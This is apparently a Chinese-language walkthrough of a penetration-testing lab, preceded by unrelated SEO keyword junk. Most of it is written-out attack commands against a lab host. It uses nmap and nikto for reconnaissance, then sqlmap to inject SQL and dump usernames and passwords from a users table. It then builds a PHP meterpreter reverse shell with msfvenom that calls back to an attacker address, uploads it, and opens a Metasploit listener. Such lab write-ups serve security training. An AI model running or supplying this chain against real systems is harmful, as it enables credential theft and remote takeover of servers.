网站备案号位置,徐州网上房地产,电商网页制作素材,有哪些网站是可以接单做任务的信息探测扫描主机服务信息以及服务版本nmap -sV 192.168.101.50快速扫描全部信息nmap -T4 -A -v 192.168.101.50扫描敏感信息nikto -host http://192.168.101.50:80深入挖掘分析nmap、nikto扫描结果#xff0c;并对结果进行分析
使用浏览器打开http://192.168.101.50:80漏洞扫…信息探测扫描主机服务信息以及服务版本nmap -sV 192.168.101.50快速扫描全部信息nmap -T4 -A -v 192.168.101.50扫描敏感信息nikto -host http://192.168.101.50:80深入挖掘分析nmap、nikto扫描结果并对结果进行分析
使用浏览器打开http://192.168.101.50:80漏洞扫描使用web漏洞扫描器owasp-zapZAP
打开之后选择Automated Scan然后输入目标ip开始进行攻击等待GET信息返回完毕
然后查看是否可以进行sql注入使用sqlmap利用sql注入漏洞sudo sqlmap -u http://192.168.101.50/cat.php?id3 查看id是否具有sql漏洞sudo sqlmap -u http://192.168.101.50/cat.php?id3 -dbs 查看数据库名sudo sqlmap -u http://192.168.101.50/cat.php?id3 -D photoblog --tables 查看对应数据库中的表sudo sqlmap -u http://192.168.101.50/cat.php?id3 -D photoblog -T users --columns 查看对应字段sudo sqlmap -u http://192.168.101.50/cat.php?id3 -D photoblog -T users -C login,password --dump 查看对应字段的值也可以直接尝试sqlmap -u-url -os-shell直接获取shell得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost192.168.101.51 lport4444 -f raw gedit shellcd.php
(将生成的php代码拷贝到shellcd.php中)上传shell反弹监听打开msfconsole
msfconsole启动监听模式
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lport 4444
run